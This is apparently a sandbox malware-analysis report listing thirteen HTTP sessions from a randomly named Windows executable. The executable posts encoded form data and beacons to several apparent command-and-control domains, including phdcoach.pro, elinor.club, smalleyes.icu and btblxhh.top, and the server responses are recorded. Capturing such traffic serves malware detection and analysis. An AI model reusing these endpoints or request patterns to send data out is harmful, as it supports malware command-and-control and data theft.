Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49714 | 178.172.160.30 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:16:08.308140993 CET | 814 | OUT | POST /izsd/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.phdcoach.pro
                                                                                                    Origin: http://www.phdcoach.pro
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.phdcoach.pro/izsd/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=8lSeCJX+QhGhY3nj4lSC5PYc0FJLg3PMdiwSG59xzwvQ2wzHACW83J3JrQ+Shqcbg++NID2xIH0N4gkoSjvtp/IAhUEN2pFsLF8UeMVUFDZYCU0Pecjh5F24249O9+nkUBlLniC2kMrybnvtBg+/YHbm+S8lgaPRavwXgr1WknI5CANuc1cKvFnnwYzyDdAbktiwimo=
Dec 3, 2024 14:16:09.697478056 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:09 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49715 | 178.172.160.30 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:16:11.043417931 CET | 834 | OUT | POST /izsd/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.phdcoach.pro
                                                                                                    Origin: http://www.phdcoach.pro
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.phdcoach.pro/izsd/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=8lSeCJX+QhGhZWXj1mKCyPYTqVJLrXPIdi8SG9FhzlHQ2SrHPjW82J3Jjw+b86cQg+zwIBSxIDcN4iMoRU7szPI44kEP7JFsLF8UeMwxFDBYCnsPc9jiil27/Y9O5+naUBllng2ckODybmftCx+8SHatwy9QuJKGQOg785x0jhYFD28EGXUMsFPMwbbEGqdz+OyA8x+bDX7OT+ErZqKKgkAD3g/L
Dec 3, 2024 14:16:12.321470976 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:12 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49716 | 178.172.160.30 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:16:13.709405899 CET | 1851 | OUT | POST /izsd/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.phdcoach.pro
                                                                                                    Origin: http://www.phdcoach.pro
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.phdcoach.pro/izsd/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 3, 2024 14:16:15.032291889 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:14 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49717 | 178.172.160.30 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:16:16.361067057 CET | 561 | OUT | GET /izsd/?1JgHkl=xn6+B8LDUgeEZE/ewkyW9IYT/XMT7FP3Y1kTMJZ4lyb9girANxKziqifoVXMiOJsh7TOAwS+CRcOnA4ABGuIrM8s5EZR8uZbFlAOcv1SbgYYGS8/Ve3tsCmgzp0y8eq9Cg==&uZ9=wvL0WTq0tnld4P HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.phdcoach.pro
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 3, 2024 14:16:17.694446087 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:17 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49718 | 194.58.112.174 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:16:23.333029985 CET | 811 | OUT | POST /1ne4/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.elinor.club
                                                                                                    Origin: http://www.elinor.club
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.elinor.club/1ne4/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=ak3bAasuzQTxEloNruBaN4ELZfgzT7d5gF9G1yIQ8eZICKXAvhaN1DMVLe5WKVQVIIocZSNW0VAvr2+n5jlpxBZrnq+w+TLl1ECyJKWZ+50IGCarXE9D767EMU7GRX2tB3HkKQUPeHEdI8CWkVNc7MNwpsZIEEIXOPzlVhkua/W7V2NndsQY9UrdAvhR29hKGANYQH0=
                                                                                                    Dec 3, 2024 14:16:24.650866032 CET | 341 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:24 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 154
                                                                                                    Connection: close
                                                                                                    Location: http://elinor.club/1ne4/
                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    6 | 192.168.2.8 | 49719 | 194.58.112.174 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Dec 3, 2024 14:16:26.050920963 CET | 831 | OUT | POST /1ne4/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.elinor.club
                                                                                                    Origin: http://www.elinor.club
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.elinor.club/1ne4/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=ak3bAasuzQTxFEYNpJVaKYEIW/gzdbdHgF5G1zM68N9ICrnAugaNyDMVfO5XVlQOIIkuZShW0VEvry6n5URm3RZp8a+y6TLl1ECyJKqz+9gIFzqrGV9Aga7LNU7Ga32pB3H8KUMpeEsdI5mWnBRds8M73cYsHUhfHMj0fxgCVI29Zg8NHOYe+UD2AsJnzK8icjdoOQgFBIjEwS+Jo8E6YutbX8jF
                                                                                                    Dec 3, 2024 14:16:27.379477024 CET | 341 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:27 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 154
                                                                                                    Connection: close
                                                                                                    Location: http://elinor.club/1ne4/
                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    7 | 192.168.2.8 | 49720 | 194.58.112.174 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Dec 3, 2024 14:16:28.709522963 CET | 1848 | OUT | POST /1ne4/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.elinor.club
                                                                                                    Origin: http://www.elinor.club
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.elinor.club/1ne4/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=ak3bAasuzQTxFEYNpJVaKYEIW/gzdbdHgF5G1zM68N1IDZfAvDyNzDMVD+5KVlRWILVlZSds0XMvrXun/h9m+RZpjq+/+TLw1Ey+JLGz+9gIFxirGE9Aia7EMU7aRX2BB3vsKUYff0MdJZ2W3i5ducM52cY0HU9QHM+Ffy8sVOG9aU8XYtA/q0rHOM5yy4FHbBJ1TnY/Ou6szQmyttprBZdrWoSlqHT282//IjHct9QsMkcgac7srJ6USqhk+fLXqxMuPDdoBlpe9DueUgFNKk8Ql8RfJo7bZWHyPEOhPEJVIiilfdK+VJqTdNQNOEJf2q716P1Pv7lfHBsQc6c42f0DerBkGbDsAmWnx5gZ8e00Ni9eiWUB2PbpQ3ka7zozybae0ZE+e712qbXXkVzDAJJgYPodDjc/XyJwLQliDIIItos6I0oiGZDYDWARQbmVhpxPQNJ4Lv8S2FoPR8D/e+jp2IoVilFjv0QzuLbX8H7QX6NmeAqiRxRSVkFr9S/D8BnAY7aC5aLoooRsmekfDLqbsojofIDa4kuxCoEBNtE7KJOKnYo8pRoZdNQFC8ytn7Z+Lkc3yo7kam+Qz8zVWnw+RncUoqI/L6Yf4488hiEMjP6xyq9Qrbn7dPd5hTUhKgPTnUReWfaR8KTlLER1zUW7h/oLQpiFSyJxLhhy2f/xPQtv7D6LHbBxhga+0L7kWOKg5sMxC6M8t28A+4e6TkLBnMnSaYwe35saCG68U+lPkWv03uK9UpRFVdCK0r8Uxys/DWKLK6IwlBebbizCyeNUTsiSLMhgc6fILDvpEtKrFxjzzfzh3Oy3oWEd7HMor/N19c+V9u86E7MRZMyvjooDUK6sTJJanhTRNRo/LBuG+0Bmtr8HtqHYCAsFRt6o+0OLh7BpcLvMnG3v6iLjHnrdlX1SFVbHguzGo4XyXMf9NG8p1cBss86fqPBQAcA8++5dq5RInZS5v18J00AeaWake4YbBuf83GwJLzq/+wNNE [TRUNCATED]
                                                                                                    Dec 3, 2024 14:16:30.021274090 CET | 341 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:29 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 154
                                                                                                    Connection: close
                                                                                                    Location: http://elinor.club/1ne4/
                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    8 | 192.168.2.8 | 49721 | 194.58.112.174 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Dec 3, 2024 14:16:31.360243082 CET | 560 | OUT | GET /1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5hRbnJSY7Fzwy0niAuWJ/cwCJWSeGkVgu4T1N3P5ck3FVA== HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.elinor.club
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:16:32.675774097 CET | 500 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:32 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 154
                                                                                                    Connection: close
                                                                                                    Location: http://elinor.club/1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5hRbnJSY7Fzwy0niAuWJ/cwCJWSeGkVgu4T1N3P5ck3FVA==
                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    9 | 192.168.2.8 | 49722 | 134.122.191.187 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Dec 3, 2024 14:16:38.673286915 CET | 817 | OUT | POST /s6zh/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.smalleyes.icu
                                                                                                    Origin: http://www.smalleyes.icu
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.smalleyes.icu/s6zh/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=6nn7X8LHMfZVIW/SkuM7i6PmFdW1N35AjPNqcaSfaFW8S3hrSduSvx/ETntUqSb5MCBrp4xflVbpN5vG6DFVO/9LEDmFt7UO5k46AOqO+IFhNiSmk5kIEQXL8RemuKC0RnKlW/jlcik5GrxYtEZ4PVxEjbzLlPCquWTnTPWSie/2l4W5967mj3ow9g+IqB7poVQYsTc=


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    10 | 192.168.2.8 | 49723 | 134.122.191.187 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Dec 3, 2024 14:16:41.339796066 CET | 837 | OUT | POST /s6zh/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.smalleyes.icu
                                                                                                    Origin: http://www.smalleyes.icu
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.smalleyes.icu/s6zh/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=6nn7X8LHMfZVO1nSmJg7zaPpK9W1DX5EjOxqcZfaa3C8SWRrTcuSsx/EcHtRlyb2MCFNp59flV/pN4fG6wdKUP9JCDmHjbUO5k46AOug+OthNRKm2sQLHQXIrhemqKCwRnKHW6fLchM5GrBYt2h7GVwPu7yK1/muiWb+Tcz3odWXkOnTnYzgg3Ab9jW+v2mBy2AoyEKmQAZ7emSmR4nWqlpS+3De
                                                                                                    Dec 3, 2024 14:16:42.922683954 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                    Server: kangle/3.5
                                                                                                    Date: Tue, 03 Dec 2024 13:08:02 GMT
                                                                                                    Set-Cookie: home_lang=cn; path=/
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    X-Cache: MISS from kangle web server
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
                                                                                                    Dec 3, 2024 14:16:42.922770977 CET | 224 | IN
                                                                                                    Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {backgrou
                                                                                                    Dec 3, 2024 14:16:42.922776937 CET | 1236 | IN
                                                                                                    Data Ascii: nd-color: #64c7f5;}.clearfix:after {clear: both;}.error-page-btn a {display: inline-block;width: 120px;height: 32px;margin: 0 15px;background-color: #70d2ff;color: white;line-height: 32px;font-size: 14px;text-decoration: none;}</style>
                                                                                                    Dec 3, 2024 14:16:42.923572063 CET | 500 | IN
                                                                                                    Data Ascii: rval(intervalCD); return; } if (oSecs == 0){ clearInterval(intervalCD); window.location.href = __root_dir__+'/'; } document.getElementById('J_countdown').innerHTML = oSec


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    11 | 192.168.2.8 | 49724 | 134.122.191.187 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Dec 3, 2024 14:16:44.039673090 CET | 1854 | OUT | POST /s6zh/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.smalleyes.icu
                                                                                                    Origin: http://www.smalleyes.icu
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.smalleyes.icu/s6zh/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:16:45.596532106 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                    Server: kangle/3.5
                                                                                                    Date: Tue, 03 Dec 2024 13:08:04 GMT
                                                                                                    Set-Cookie: home_lang=cn; path=/
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    X-Cache: MISS from kangle web server
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    12 | 192.168.2.8 | 49725 | 134.122.191.187 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Dec 3, 2024 14:16:46.707627058 CET | 562 | OUT | GET /s6zh/?1JgHkl=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMIJvPVmvlNwG1HEhIOCZ2tdwLUOtnvozCQbX7z6vra7jTg==&uZ9=wvL0WTq0tnld4P HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.smalleyes.icu
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:16:48.424956083 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                    Server: kangle/3.5
                                                                                                    Date: Tue, 03 Dec 2024 13:08:07 GMT
                                                                                                    Set-Cookie: home_lang=cn; path=/
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    X-Cache: MISS from kangle web server
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    13 | 192.168.2.8 | 49726 | 156.234.28.101 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Dec 3, 2024 14:16:54.913216114 CET | 811 | OUT | POST /dp9c/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.btblxhh.top
                                                                                                    Origin: http://www.btblxhh.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.btblxhh.top/dp9c/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Ascii: 1JgHkl=SK8iALUXp2haLrl5pv8s1UcLa5mkS3GPTTckjAG77ylTjSnMEe5doGAHOmFtrsioVLL4vkEZtJfBdEy4daSfImLWWgY5OvLQXlencce7Fd9+QEbQYxp+W1BncPMJce4R4KefD4bkqCRqj51g4sBnEDiehn4k4QnYisoc699apd25OjL49IDGU8sXxazmegyqE2DnvcE=
                                                                                                    Dec 3, 2024 14:16:56.493078947 CET | 1135 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
